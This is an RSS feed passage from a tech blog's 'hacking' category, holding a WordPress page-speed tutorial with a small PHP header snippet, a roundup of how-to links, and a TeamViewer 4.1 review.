<?xml version="1.0" encoding="UTF-8"?> <rss
version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
><channel><title>Honeytech Blog - Top 10 &#124; Tutorials &#124; Internet Tools &#124; How to &#124; Guides &#187; hacking</title> <atom:link href="http://www.honeytechblog.com/topics/hacking/feed/" rel="self" type="application/rss+xml" /><link>http://www.honeytechblog.com</link> <description>Honeytech Blog is a technology portal of Tutorials, How to, Tips and Guides of Internet Tools, Social Media, Blogging , Wordpress, Open Source and Ways to make money online.</description> <lastBuildDate>Sat, 20 Mar 2010 22:17:07 +0000</lastBuildDate> <generator>http://wordpress.org/?v=2.9.2</generator> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <item><title>How to optimize website loading time and performance</title><link>http://www.honeytechblog.com/how-to-optimize-website-loading-time-and-performance/</link> <comments>http://www.honeytechblog.com/how-to-optimize-website-loading-time-and-performance/#comments</comments> <pubDate>Sat, 04 Jul 2009 03:47:33 +0000</pubDate> <dc:creator>Honey Singh</dc:creator> <category><![CDATA[How to]]></category> <category><![CDATA[Tips & twiks]]></category> <category><![CDATA[hacking]]></category> <category><![CDATA[themes]]></category> <category><![CDATA[web2.0]]></category> <category><![CDATA[wordpress]]></category> <category><![CDATA[optimization]]></category> <category><![CDATA[theme]]></category> <category><![CDATA[tips]]></category> <category><![CDATA[website]]></category><guid
isPermaLink="false">http://www.honeytechblog.com/?p=4584</guid> <description><![CDATA[Internet users are quite restless and never wait if your website is too heavy to load in the normal internet connection. Web site optimization is an important phase that decides the productivity of the websites. So never frustrate your users  with slow loading time and complicated and confusing navigations.
Recently i optimized this blog after so [...]]]></description> <content:encoded><![CDATA[<div
class="topsy_widget_data topsy_theme_brick-red" style="float: right;margin-left: 0.75em; background: url(data:,%7B%20%22url%22%3A%20%22http%3A%2F%2Fwww.honeytechblog.com%2Fhow-to-optimize-website-loading-time-and-performance%2F%22%2C%20%22style%22%3A%20%22big%22%2C%20%22title%22%3A%20%22How%20to%20optimize%20website%20loading%20time%20and%20performance%22%20%7D);"></div><p>Internet users are quite restless and never wait if your website is too heavy to load in the normal internet connection. Web site optimization is an important phase that decides the productivity of the websites. So never frustrate your users  with slow loading time and complicated and confusing navigations.</p><p>Recently i optimized this blog after so many tricks and tips like logics to load the header files, javascripts compression , hacking wordpress plugins , compressing and optimizing the custom style sheets. Through this post i would like to convey all the important points that i implemented on the honeytechblog which helps in optimizing its loading times. You can use this <a
href="http://www.websiteoptimization.com/services/analyze/">free website performance tool</a> for web page speed analysis and compare the loading time of your blogs with honeytechblog.<img
style="border-bottom: 0px; border-left: 0px; margin: 15px auto 0px; display: block; float: none; border-top: 0px; border-right: 0px" title="optimization_report" src="http://www.honeytechblog.com/wp-content/uploads/2009/07/optimization_report.png" border="0" alt="optimization report How to optimize website loading time and performance" width="564" height="179" /></p><p>If your blog is not well optimized then the question is<strong> how to optimize the websites?</strong></p><p><strong>Their are many ways to enhance the performance of the website like these <a
title="http://www.honeytechblog.com/top-10-way-to-speed-up-your-website/" href="http://www.honeytechblog.com/top-10-way-to-speed-up-your-website/">top 10 way to speed up your website</a>, few of the experimented process apart from </strong><a
title="Permanent Link: 20 Easy Ways to Increase Website Traffic" rel="bookmark" href="../20-easy-ways-to-increase-website-traffic/">20 easy ways for increasing website traffic</a><strong> are described as follows:</strong></p><p><strong>1.</strong>I checked for the use of heavy files on the home pages and figure out the objects that sucks the loading time. As a results i came to know that <a
href="www.honeytechblog.com/how-to-add-featured-content-slider-into-wordpress-blog/">featured content</a> gallery is taking too much time to load for the new users. (You can leave this option in case feature contents are important feature for your blog)</p><p><strong>2.</strong>I checked for the number of HTTP requests from the home page. I have only single page without any <em>iframe </em>so this option looks fine on my homepage.</p><p><strong>3.</strong>I checked for all the images and try to avoid the use of too many images on the homepage. This can be done by using following methods:</p><p><img
style="border-bottom: 0px; border-left: 0px; display: block; float: none; margin-left: auto; border-top: 0px; margin-right: auto; border-right: 0px" title="optimization_sprites" src="http://www.honeytechblog.com/wp-content/uploads/2009/07/optimization_sprites.gif" border="0" alt="optimization sprites How to optimize website loading time and performance" width="548" height="567" /></p><ul><li>Use of CSS sprites.</li><li>Using images from different hosts or sub domains. For example media.yoursite.com.</li><li>Initially their were so many images like logos, social icons, profile images, rss buttons and collectively they consume more than 100KB but after the implementation of CSS Sprites it optimized to only 31KB.</li></ul><p><img
style="border-bottom: 0px; border-left: 0px; display: block; float: none; margin-left: auto; border-top: 0px; margin-right: auto; border-right: 0px" title="optimization_sprites_after" src="http://www.honeytechblog.com/wp-content/uploads/2009/07/optimization_sprites_after.gif" border="0" alt="optimization sprites after How to optimize website loading time and performance" width="550" height="394" /></p><p><strong>Note:</strong> I’ll cover up the CSS Sprites optimization in the up coming posts and you can also check few ways to improve your <a
href="http://www.techprone.com/how-to-improve-your-web-performance-using-css-sprites/">web performance using CSS-Sprites</a>.</p><p><strong>4.</strong>Try to avoid too many css calls on the homepage. For example wordpress plugins require large resources which calls useless css and javascripts files on the homepage.  Try to avoid <strong><cite>&lt;?php</cite> wp_head(); </strong><cite><strong>?&gt;</strong></cite> on the home page and use alternative methods like i used on honeytechblog. The method is described as follows:</p><ol><li><cite>Go to wordpress theme directory located at wp-content/themes/yourtheme and open index.php file</cite></li><li><cite>Find the tag  &lt;?php</cite> get_header();<cite>?&gt; and replace it with below mention code</cite></li></ol><pre class="csharpcode">&lt;?php
<span class="kwrd">if</span> ($_SERVER[<span class="str">'REQUEST_URI'</span>] != <span class="str">"/"</span>)
{
get_header();
}
<span class="kwrd">else</span>
{
include (<span class="str">"header-home.php"</span>);
}
?&gt;</pre><ol></ol><p>Now the above code require a new header file which doesn’t call the <strong><cite>&lt;?php</cite> wp_head();<cite>?&gt;</cite></strong> on the home page.<strong> </strong></p><p><strong>How the use of two header files works:</strong></p><p><a
href="http://www.honeytechblog.com/wp-content/uploads/2009/07/optimization.png"><img
style="border-bottom: 0px; border-left: 0px; margin: 0px 20px 0px 0px; display: inline; border-top: 0px; border-right: 0px" title="optimization" src="http://www.honeytechblog.com/wp-content/uploads/2009/07/optimization_thumb.png" border="0" alt="optimization thumb How to optimize website loading time and performance" width="176" height="240" align="left" /></a> When users view the home page then it calls the header-home.php and on the other pages it will call the default header files together with your plugins.</p><p>Note: After the implementation of this trick my loading time decreased down to more than 300%. (As i used so many plugins and files on the home page but i cut it down to few specific only. I’ll cover up the must have wordpress plugins in the upcoming posts.)</p><p><strong>How to create two header files and get them working with your theme</strong></p><p>Follow the following process to create two homepage files:</p><ol><li>Go to your theme directory located at wp-contents/themes/yourtheme and file the file named header.php</li><li>Copy all the contents of the header.php and paste them into a new file named as header-home.php</li><li>Now fined the code name <strong><cite>&lt;?php</cite> wp_head();<cite>?&gt;</cite></strong> into your header-home.php and delete it.</li><li>Now your alternate header file is ready to use but this header file is manual and you need to include few important things like meta tags and descriptions generated by “<em><a
href="http://wordpress.org/extend/plugins/all-in-one-seo-pack/">All in one SEO Plugin</a></em>”. So in next step you need to find the dynamic meta contents.</li><li>Open your blog in the browser and then view its source. Just search for codes between <strong>&lt;!&#8211; all in one seo pack 1.5.1 –&gt;  and &lt;!&#8211; /all in one seo pack –&gt;.</strong> It generally includes the meta tags like<strong> &lt;meta name=&#8221;description&#8221; content=&#8221;" /&gt; </strong><strong>&lt;meta name=&#8221;keywords&#8221; content=&#8221;" /&gt; </strong><strong>&lt;link rel=&#8221;canonical&#8221; href=&#8221;yourdomainname.com&#8221; /&gt;</strong></li><li>Now your new header file is ready to test. Now you have options to include this header-home.php file into your theme directory or in root directory of the blog. I choose the option of root directory as its easy to edit it for future uses.</li><li>As an backup option upload the header-home.php file into root directory i.e yourblog/header-home.php and also into the theme directory ie wp-contents/theme/header-home.php.</li><li>Now you are completely ready to run the blog. Just don’t forget to change the index.php file described in the above mention process.</li></ol><p><strong>Note:</strong> You will realized that your loading time is enhanced as now their isn’t any useless calls of the plugins which is not required on the home page. For example script generated by <a
href="http://www.deliciousdays.com/cforms-plugin">cforms</a> , sociable and other plugins. (if you used them only on single pages)  <img
style="border-bottom: 0px; border-left: 0px; display: block; float: none; margin-left: auto; border-top: 0px; margin-right: auto; border-right: 0px" title="optimization_report_time" src="http://www.honeytechblog.com/wp-content/uploads/2009/07/optimization_report_time1.png" border="0" alt="optimization report time1 How to optimize website loading time and performance" width="334" height="236" /></p><p></p><p><strong>5.</strong>Try to avoid excess external scripts.</p><p>While checking the page source i found useless script like wp-includes/js/jquery/jquery.js so i removed it using above mention method of two header files.</p><p><strong>6.</strong>Try to avoid use of multimedia files on the home page. Multimedia files like heavy flash and video require too much bandwidth and loading time. As discussed above i use to have the featured content gallery on the home page but i removed it while going through the optimization process. It requires more than 5 big image as an article image and more than 5 thumbnail images so after the removal it reduced the page from by more than150 Kb.</p><p><strong>7.</strong>Shift all the media files, css and javascripts into another subdomain. Shifting css files is very simple piece of cake. Follow these steps:</p><ul><li>Create a subdomain where you need to put these CSS files. For example i create <em>media.honeytechblog.com</em></li><li>Search for style.css used in your wordpress themes i.e <em>yourblog/wp-contents/themes/yourtheme/style.css</em></li><li><em>Search for images used in the style.css. Generally these images includes in the same theme folder i.e <em>yourblog/wp-contents/themes/yourtheme/images</em></em></li><li><em>Copy the style.css and the images folder and shift then to desired subdomain. For example </em><em>a)I </em><em>shift the css files into media.honeytechblog.com/<strong>s1</strong>/style.css and images b)I shift the images into media.honeytechblog.com/s1/images folder. Note: I  shift the files into the <strong>s1 as a subfolder </strong>to differentiate the versions for future use. It is not necessary but things will be neat for future use.</em></li></ul><p><strong>Note:</strong> I try to keep this post short and simple but in case you have any issues then feel free to comments and i’ll try to resolve it. In coming days their will be more posts on the wordpress customizations and optimizations so its better if you subscribed to our official <a
href="http://feeds.feedburner.com/honeytechblog">RSS</a>.</p>Similar Posts:<ul><li><a
href="http://www.honeytechblog.com/how-to-auto-add-excerpt-in-the-wordpress-blog-home-page/" rel="bookmark" title="August 20, 2009">How to auto add excerpt in the wordpress blog home page</a></li><li><a
href="http://www.honeytechblog.com/how-to-hide-a-categories-posts-from-home-page-without-any-plugin/" rel="bookmark" title="September 11, 2009">How to hide a categories posts from Home page without using any plugin</a></li><li><a
href="http://www.honeytechblog.com/how-to-use-multi-tabbed-menu-in-wordpress/" rel="bookmark" title="August 15, 2008">How to use multi tabbed menu in wordpress</a></li><li><a
href="http://www.honeytechblog.com/how-to-decide-the-robots-txt-for-wordpress-blogs/" rel="bookmark" title="September 14, 2009">How to decide the robots.txt for Wordpress blogs</a></li><li><a
href="http://www.honeytechblog.com/top-10-way-to-speed-up-your-website/" rel="bookmark" title="July 2, 2008">Top 10 way to speed up your website</a></li></ul><h3><a
href="http://www.facebook.com/honeytechblog">Join our Facebook Fanpage</a></h3> ]]></content:encoded> <wfw:commentRss>http://www.honeytechblog.com/how-to-optimize-website-loading-time-and-performance/feed/</wfw:commentRss> <slash:comments>23</slash:comments> </item> <item><title>How-To Collection: Best Of 30 Greatest Tips/Tricks</title><link>http://www.honeytechblog.com/how-to-collection-best-of-30-greatest-tipstricks/</link> <comments>http://www.honeytechblog.com/how-to-collection-best-of-30-greatest-tipstricks/#comments</comments> <pubDate>Mon, 01 Jun 2009 17:18:36 +0000</pubDate> <dc:creator>Sakib Mahmud</dc:creator> <category><![CDATA[AIR]]></category> <category><![CDATA[CS3]]></category> <category><![CDATA[Designs]]></category> <category><![CDATA[Firefox hacks]]></category> <category><![CDATA[How to]]></category> <category><![CDATA[Internet]]></category> <category><![CDATA[Interview]]></category> <category><![CDATA[Intresting Images]]></category> <category><![CDATA[Linux]]></category> <category><![CDATA[Microsoft]]></category> <category><![CDATA[NewsTech]]></category> <category><![CDATA[Stuff]]></category> <category><![CDATA[Tips & twiks]]></category> <category><![CDATA[Top 10]]></category> <category><![CDATA[Top Sites]]></category> <category><![CDATA[Vista]]></category> <category><![CDATA[Web design]]></category> <category><![CDATA[Windows]]></category> <category><![CDATA[adobe]]></category> <category><![CDATA[apple]]></category> <category><![CDATA[applications]]></category> <category><![CDATA[blogging]]></category> <category><![CDATA[free]]></category> <category><![CDATA[freedom]]></category> <category><![CDATA[hacking]]></category> <category><![CDATA[iphone]]></category> <category><![CDATA[iphone 3G]]></category> <category><![CDATA[microblogging]]></category> <category><![CDATA[photoshop]]></category> <category><![CDATA[twitter]]></category> <category><![CDATA[ubuntu]]></category> <category><![CDATA[web2.0]]></category> <category><![CDATA[wordpress]]></category> <category><![CDATA[how stuff works]]></category> <category><![CDATA[how to do]]></category> <category><![CDATA[tips]]></category> <category><![CDATA[tips tricks]]></category> <category><![CDATA[tricks]]></category><guid
isPermaLink="false">http://www.honeytechblog.com/?p=4423</guid> <description><![CDATA[In last week we collected most  Kick-Ass Greatest TOP Rated Featured List and  The Greatest Resource For Entrepreneurs and in this month we are over  enthusiast to give something new. We know, thousands of weblogs exist on web  just based on &#8220;how to/tips and tricks&#8221;. Those thousands of websites generating  [...]]]></description> <content:encoded><![CDATA[<div
class="topsy_widget_data topsy_theme_brick-red" style="float: right;margin-left: 0.75em; background: url(data:,%7B%20%22url%22%3A%20%22http%3A%2F%2Fwww.honeytechblog.com%2Fhow-to-collection-best-of-30-greatest-tipstricks%2F%22%2C%20%22style%22%3A%20%22big%22%2C%20%22title%22%3A%20%22How-To%20Collection%3A%20Best%20Of%2030%20Greatest%20Tips%2FTricks%22%20%7D);"></div><p><img
style="max-width: 800px;" src="../wp-content/uploads/2009/06/tips.png" alt="tips How To Collection: Best Of 30 Greatest Tips/Tricks"  title="How To Collection: Best Of 30 Greatest Tips/Tricks photo" /></p><p><span
style="font-family: Times New Roman;">In last week we collected most <a
title="Permanent Link to Kick-Ass Greatest TOP Rated Featured List" rel="bookmark" href="../kick-ass-greatest-top-rated-featured-list/"> Kick-Ass Greatest TOP Rated Featured List</a> and <a
title="Permanent Link to Become An Entrepreneur : Great Resource For Entrepreneurs" rel="bookmark" href="../become-a-entrepreneur-great-resource-for-entrepreneurs/"> The Greatest Resource For Entrepreneurs</a> and in this month we are over  enthusiast to give something new. We know, thousands of weblogs exist on web  just based on &#8220;how to/tips and tricks&#8221;. Those thousands of websites generating  revenue from different types of advertisement &#8212; which can be millions of  dollar, some are really worthy and some are exclusive and overall helping the  web users.</span></p><p><span
style="font-family: Times New Roman;"><br
/> From the top ranked sites, we tried to collect &#8220;how to&#8221; based best posts, where  you can get free tips, tricks of Linux, twitter, adobe illustrator tutorials,  CSS productivity, PHP, Design, Windows Tips, Google Adsense Tips, Photography  tips, Facebook tips, iPhone 3G solutions, security tips, internet searching,  beginners guide, professional presentation tips and tons of new things. Most probably this post will cover up all of your needs &#8212; you can search out all of your  problems. </span></p><ol><li> <a
class="offsite ct-technology" title="http://www.tuxradar.com/content/linux-tips-every-geek-should-know" rel="dc:source, d1lFIH" href="http://www.tuxradar.com/content/linux-tips-every-geek-should-know"> Linux tips every geek should know</a></li><li> <a
class="offsite ct-technology" title="http://www.pcmag.com/article2/0,2817,2341095,00.asp" rel="dc:source, d1kLR2" href="http://www.pcmag.com/article2/0,2817,2341095,00.asp"> Top 10 Twitter Tips for Beginners</a></li><li> <a
class="offsite ct-technology" title="http://wefunction.com/2009/04/quality-within-web-design/" rel="dc:source, d1obFG" href="http://wefunction.com/2009/04/quality-within-web-design/"> How to Spot Quality within Web Design: Examples &amp; Tips</a></li><li> <a
class="offsite ct-technology" title="http://www.noupe.com/illustrator/80-best-of-adobe-illustrator-tutorials-brushes-epss-and-resources.html" rel="dc:source, d1iGYx" href="http://www.noupe.com/illustrator/80-best-of-adobe-illustrator-tutorials-brushes-epss-and-resources.html"> 80 Most Wanted Adobe Illustrator Tutorials &amp; Resources</a></li><li> <a
class="offsite ct-technology" title="http://net.tutsplus.com/tutorials/html-css-techniques/5-tips-to-writing-better-css/" rel="dc:source, d1kTSr" href="http://net.tutsplus.com/tutorials/html-css-techniques/5-tips-to-writing-better-css/"> 5 Tips For Instantly Writing Better CSS</a></li><li> <a
class="offsite ct-technology" title="http://css-tricks.com/php-for-beginners-building-your-first-simple-cms/" rel="dc:source, d1hon9" href="http://css-tricks.com/php-for-beginners-building-your-first-simple-cms/"> PHP for Beginners: Building Your First Simple CMS</a></li><li> <a
class="offsite ct-technology" title="http://www.noupe.com/illustrator/adobe-illustrator-tutorials.html" rel="dc:source, d1njAk" href="http://www.noupe.com/illustrator/adobe-illustrator-tutorials.html"> 30+ NEW Adobe Illustrator Tutorials &amp; Neat Tips </a></li><li> <a
class="offsite ct-technology" title="http://www.smashingmagazine.com/2009/02/17/10-easy-steps-to-advanced-photography-skills/" rel="dc:source, d1kRw1" href="http://www.smashingmagazine.com/2009/02/17/10-easy-steps-to-advanced-photography-skills/"> 10 Easy Steps To Advanced Photography Skills</a></li><li> <a
class="offsite ct-technology" title="http://www.maximumpc.com/article/features/20_windows_7_tweaks_tips_%E2%80%93_every_secret_uncovered_date" rel="dc:source, d1iTnP" href="http://www.maximumpc.com/article/features/20_windows_7_tweaks_tips_%E2%80%93_every_secret_uncovered_date"> 20 Windows 7 Tweaks &amp; Tips: Every Secret Uncovered to Date </a></li><li> <a
class="offsite ct-technology" title="http://www.smashingmagazine.com/2009/04/06/design-to-sell-12-tips-to-help-your-website-convert/" rel="dc:source, d1o2if" href="http://www.smashingmagazine.com/2009/04/06/design-to-sell-12-tips-to-help-your-website-convert/"> Design To Sell: 8 Useful Tips To Help Your Website Convert</a></li><li> <a
class="offsite ct-technology" title="http://www.techradar.com/news/software/operating-systems/50-seriously-useful-windows-7-tips-528483" rel="dc:source, d1jyrz" href="http://www.techradar.com/news/software/operating-systems/50-seriously-useful-windows-7-tips-528483"> 50 Seriously Useful Windows 7 Tips</a></li><li> <a
class="offsite ct-technology" title="http://www.pcworld.com/printable/article/id,161688/printable.html" rel="dc:source, d1moee" href="http://www.pcworld.com/printable/article/id,161688/printable.html"> Ten Facebook Tips For Power Users </a></li><li> <a
class="offsite ct-technology" title="http://www.makeuseof.com/tag/3-speedy-tips-for-faster-browsing-in-firefox/" rel="dc:source, d1kUE3" href="http://www.makeuseof.com/tag/3-speedy-tips-for-faster-browsing-in-firefox/"> 5 Speedy Tips For Faster Browsing In Firefox</a></li><li> <a
class="offsite ct-technology" title="http://www.popularmechanics.com/home_journal/tools/4314786.html" rel="dc:source, d1pzww" href="http://www.popularmechanics.com/home_journal/tools/4314786.html"> 50 Tools Everyone Should Own (With Tips!)</a></li><li> <a
class="offsite ct-technology" title="http://www.hongkiat.com/blog/25-most-wanted-tips-for-iphone-3g/" rel="dc:source, d1n9lm" href="http://www.hongkiat.com/blog/25-most-wanted-tips-for-iphone-3g/"> 25 (Most Wanted) Tips For iPhone 3G | How-To</a></li><li> <a
class="offsite ct-technology" title="http://www.smashingmagazine.com/2009/03/24/10-useful-php-tips-revisited/" rel="dc:source, d1n3VF" href="http://www.smashingmagazine.com/2009/03/24/10-useful-php-tips-revisited/"> 10 Advanced PHP Tips Revisited</a></li><li> <a
class="offsite ct-technology" title="http://digital-photography-school.com/14-tips-for-great-candlelight-photography" rel="dc:source, d1k7aN" href="http://digital-photography-school.com/14-tips-for-great-candlelight-photography"> 15 Tips for Great Candlelight Photography</a></li><li> <a
class="offsite ct-technology" title="http://freelancefolder.com/35-online-tools-to-make-your-freelance-career-easier/" rel="dc:source, d1rDr6" href="http://freelancefolder.com/35-online-tools-to-make-your-freelance-career-easier/"> 35 Online Tools That Make Your Freelance Career Easier</a></li><li> <a
class="offsite ct-technology" title="http://www.layersmagazine.com/fourth-annual-layers-100-wicked-tips.html" rel="dc:source, d1rs6d" href="http://www.layersmagazine.com/fourth-annual-layers-100-wicked-tips.html"> 100 Professional CS4 Tips &amp; Secrets from Adobe Employees</a></li><li> <a
class="offsite ct-technology" title="http://arstechnica.com/web/guides/2009/03/how-to-win-twitter-followers-and-influence-people.ars" rel="dc:source, d1mO4B" href="http://arstechnica.com/web/guides/2009/03/how-to-win-twitter-followers-and-influence-people.ars"> How to win Twitter followers and influence people</a></li><li> <a
class="offsite ct-technology" title="http://digital-photography-school.com/8-guidelines-to-taking-panoramic-photos-with-any-camera" rel="dc:source, d1rZ4g" href="http://digital-photography-school.com/8-guidelines-to-taking-panoramic-photos-with-any-camera"> 8 Tips for Taking Panoramic Photos with Any Camera </a></li><li> <a
class="offsite ct-technology" title="http://thelede.blogs.nytimes.com/2009/02/07/25-random-tips-for-the-busy-facebook-user/?hp" rel="dc:source, d1jiVQ" href="http://thelede.blogs.nytimes.com/2009/02/07/25-random-tips-for-the-busy-facebook-user/?hp"> 25 Random Tips for the Busy Facebook User</a></li><li> <a
class="offsite ct-technology" title="http://www.noupe.com/wordpress/13-great-wordpress-speed-tips-tricks-for-max-performance.html" rel="dc:source, d1mzcA" href="http://www.noupe.com/wordpress/13-great-wordpress-speed-tips-tricks-for-max-performance.html"> 13 Great WordPress Speed Tips &amp; Tricks for MAX Performance </a></li><li> <a
class="offsite ct-technology" title="http://www.maclife.com/article/feature/ilife_09_tips_and_tricks" rel="dc:source, d1ixTJ" href="http://www.maclife.com/article/feature/ilife_09_tips_and_tricks"> 20 Helpful iLife &#8216;09 Tips and Tricks</a></li><li> <a
class="offsite ct-technology" title="http://www.pcmag.com/article2/0,2817,2345395,00.asp" rel="dc:source, d1owCQ" href="http://www.pcmag.com/article2/0,2817,2345395,00.asp"> 22 Tips and Apps for Your iPhone&#8217;s Camera</a></li><li> <a
class="offsite ct-technology" title="http://www.smashingmagazine.com/2009/03/19/100-google-adsense-tools-tips-and-resources/" rel="dc:source, d1mgB5" href="http://www.smashingmagazine.com/2009/03/19/100-google-adsense-tools-tips-and-resources/"> 100% Google AdSense: Tools, Tips and Resources</a></li><li> <a
class="offsite ct-technology" title="http://jobmob.co.il/blog/get-many-twitter-followers-power-user-secrets/" rel="dc:source, d1mdZj" href="http://jobmob.co.il/blog/get-many-twitter-followers-power-user-secrets/"> 47 Twitter Power Users’ Secrets To Getting Many Followers</a></li><li> <a
class="offsite ct-technology" title="http://www.makeuseof.com/tag/10-tips-for-preparing-a-professional-presentation/" rel="dc:source, d1rwfN" href="http://www.makeuseof.com/tag/10-tips-for-preparing-a-professional-presentation/"> 10 Powerpoint Tips for Preparing a Professional Presentation</a></li><li> <a
class="offsite ct-technology" title="http://www.pcmag.com/article2/0,2817,2346373,00.asp" rel="dc:source, d1qHR9" href="http://www.pcmag.com/article2/0,2817,2346373,00.asp"> 8 Tips for Super Internet Searching</a></li><li> <a
class="offsite ct-technology" title="http://www.techradar.com/news/internet/10-easy-ways-to-boost-your-online-security-591191" rel="dc:source, d1oOg9" href="http://www.techradar.com/news/internet/10-easy-ways-to-boost-your-online-security-591191"> 10 easy ways to boost your online security </a></li></ol><p><span
style="font-family: Times New Roman;">We might update new how to, tips and tricks based  links. If anything we missed or if any post which you think, it&#8217;s so productive  &#8212; let us know by comments, we appriciate your comments.<br
/> </span></p>Similar Posts:<ul><li><a
href="http://www.honeytechblog.com/35-mobile-applications-for-twitter/" rel="bookmark" title="December 5, 2008">35 Mobile applications for Twitter</a></li><li><a
href="http://www.honeytechblog.com/top-20-%e2%80%9chow-to%e2%80%9d-sites-for-just-about-anything/" rel="bookmark" title="December 3, 2009">Top 20 “How To” Sites For Just About Anything</a></li><li><a
href="http://www.honeytechblog.com/kick-ass-greatest-top-rated-featured-list/" rel="bookmark" title="May 28, 2009">Kick-Ass Greatest TOP Rated Featured List</a></li><li><a
href="http://www.honeytechblog.com/10-tips-to-save-time-on-twitter/" rel="bookmark" title="July 14, 2009">10 Tips to save time on Twitter</a></li><li><a
href="http://www.honeytechblog.com/15-free-and-open-source-tools-for-web-designers-developers/" rel="bookmark" title="March 16, 2009">15 free and open source tools for web designers / developers</a></li></ul><h3><a
href="http://www.facebook.com/honeytechblog">Join our Facebook Fanpage</a></h3> ]]></content:encoded> <wfw:commentRss>http://www.honeytechblog.com/how-to-collection-best-of-30-greatest-tipstricks/feed/</wfw:commentRss> <slash:comments>18</slash:comments> </item> <item><title>TeamViewer Brings More Faster Messaging, Presentations In Version 4.1</title><link>http://www.honeytechblog.com/teamviewer-brings-more-faster-messaging-presentations-in-version-41/</link> <comments>http://www.honeytechblog.com/teamviewer-brings-more-faster-messaging-presentations-in-version-41/#comments</comments> <pubDate>Thu, 30 Apr 2009 12:14:39 +0000</pubDate> <dc:creator>Sakib Mahmud</dc:creator> <category><![CDATA[Internet]]></category> <category><![CDATA[NewsTech]]></category> <category><![CDATA[applications]]></category> <category><![CDATA[free]]></category> <category><![CDATA[hacking]]></category> <category><![CDATA[connector]]></category> <category><![CDATA[free ware]]></category> <category><![CDATA[teamviewer]]></category><guid
isPermaLink="false">http://www.honeytechblog.com/teamviewer-brings-more-faster-messaging-presentations-in-version-41/</guid> <description><![CDATA[When your friend having face any critical problem in his/her PC? What will you do? If you know the solution,you will try your best to give details instructions by phone or by email. But, sometimes it&#8217;s really not worked out. If you have one options to fix his/her PC by self instructions. No worries.
Teamviewer brings [...]]]></description> <content:encoded><![CDATA[<div
class="topsy_widget_data topsy_theme_brick-red" style="float: right;margin-left: 0.75em; background: url(data:,%7B%20%22url%22%3A%20%22http%3A%2F%2Fwww.honeytechblog.com%2Fteamviewer-brings-more-faster-messaging-presentations-in-version-41%2F%22%2C%20%22style%22%3A%20%22big%22%2C%20%22title%22%3A%20%22TeamViewer%20Brings%20More%20Faster%20Messaging%2C%20Presentations%20In%20Version%204.1%22%20%7D);"></div><p><img
style="max-width: 800px;" src="http://www.honeytechblog.com/wp-content/uploads/2009/04/teamviewer-shot.jpg" alt="teamviewer shot TeamViewer Brings More Faster Messaging, Presentations In Version 4.1"  title="TeamViewer Brings More Faster Messaging, Presentations In Version 4.1 photo" /><br
/> When your friend having face any critical problem in his/her PC? What will you do? If you know the solution,you will try your best to give details instructions by phone or by email. But, sometimes it&#8217;s really not worked out. If you have one options to fix his/her PC by self instructions. No worries.</p><p><a
href="http://www.teamviewer.com/download/index.aspx">Teamviewer</a> brings such types of software which gives you access to enter your friends computer through the internet connect and available for <a
href="http://www.teamviewer.com/download/index.aspx">free download</a>. You can control your friends PC from your PC. Even, you can use your friends &#8212; all applications such as, office 2007, browsers, install applications, remove applications, open any applications &#8212; just you will the admin. More recently their improves the connection speeds of performance. Now it has more faster connection and on title bar it enabled &#8220;<strong>quick-sharing button</strong>&#8221; by clicking that button you can communicate/ contact or instantly connect with your friends PC and a new window will open up in front of you. If you like, you can share your files with super speed, no matter the data size can be Giga but you needs faster internet connection and it may take several times to transfer such big files.</p><h3>File Transfer from TeamViewer</h3><p><a
rel="attachment wp-att-5355" href="http://www.honeytechblog.com/teamviewer-brings-more-faster-messaging-presentations-in-version-41/teamviewer-demo/"><img
class="aligncenter size-large wp-image-5355" title="teamviewer-demo" src="http://i.honeytechblog.com/2009/04/teamviewer-demo-1024x698.png" alt="teamviewer demo 1024x698 TeamViewer Brings More Faster Messaging, Presentations In Version 4.1" width="560" height="399" /></a></p><p><a
rel="attachment wp-att-5362" href="http://www.honeytechblog.com/teamviewer-brings-more-faster-messaging-presentations-in-version-41/teamviewer-file-transfer/"><img
class="aligncenter size-large wp-image-5362" title="teamviewer-file-transfer" src="http://i.honeytechblog.com/2009/04/teamviewer-file-transfer-1024x671.png" alt="teamviewer file transfer 1024x671 TeamViewer Brings More Faster Messaging, Presentations In Version 4.1" width="562" height="367" /></a> However, the messaging system totally changed and now supporting conferencing with more then two users and you can send direct messages to your contact list and even when they are offline mode. Now, it&#8217;s free for <a
href="http://www.teamviewer.com/presse/20090429.aspx">personal purpose</a> see details in press.</p><p><strong>Note:</strong> I personally use the TeamViewer for handling the projects within my tea. It increases my efficiency by 10 times and helps me in training the new trainees. It also helps me in demonstrating the projects requirements , transferring the necessary files and even working remotely on different applications.</p><p><strong>My ratings:</strong> <strong>8.5/10</strong></p><div
class="zemanta-pixie"><img
class="zemanta-pixie-img" src="http://img.zemanta.com/pixy.gif?x-id=a06b35cf-f6cc-8f27-83b7-8f4716bf73e4" alt=" TeamViewer Brings More Faster Messaging, Presentations In Version 4.1"  title="TeamViewer Brings More Faster Messaging, Presentations In Version 4.1 photo" /></div>Similar Posts:<ul><li><a
href="http://www.honeytechblog.com/20-applications-freeware-utility-software-try-atleast-once/" rel="bookmark" title="May 1, 2009">20+ Applications, Freeware, Utility Software &#8212; Try Atleast Once</a></li><li><a
href="http://www.honeytechblog.com/30-essential-free-adobe-air-applications/" rel="bookmark" title="April 24, 2009">30+ Essential Free Adobe AIR Applications</a></li><li><a
href="http://www.honeytechblog.com/zimbra-desktop-email-client-10-get-it-free/" rel="bookmark" title="April 30, 2009">Zimbra Desktop Email Client 1.0 (Get It Free)</a></li><li><a
href="http://www.honeytechblog.com/36-productive-facebook-applications/" rel="bookmark" title="April 17, 2009">36 Productive Facebook Applications</a></li><li><a
href="http://www.honeytechblog.com/how-to-shield-in-open-wi-fi-hotspot/" rel="bookmark" title="March 18, 2009">How to Shield in open wi-fi Hotspot</a></li></ul><h3><a
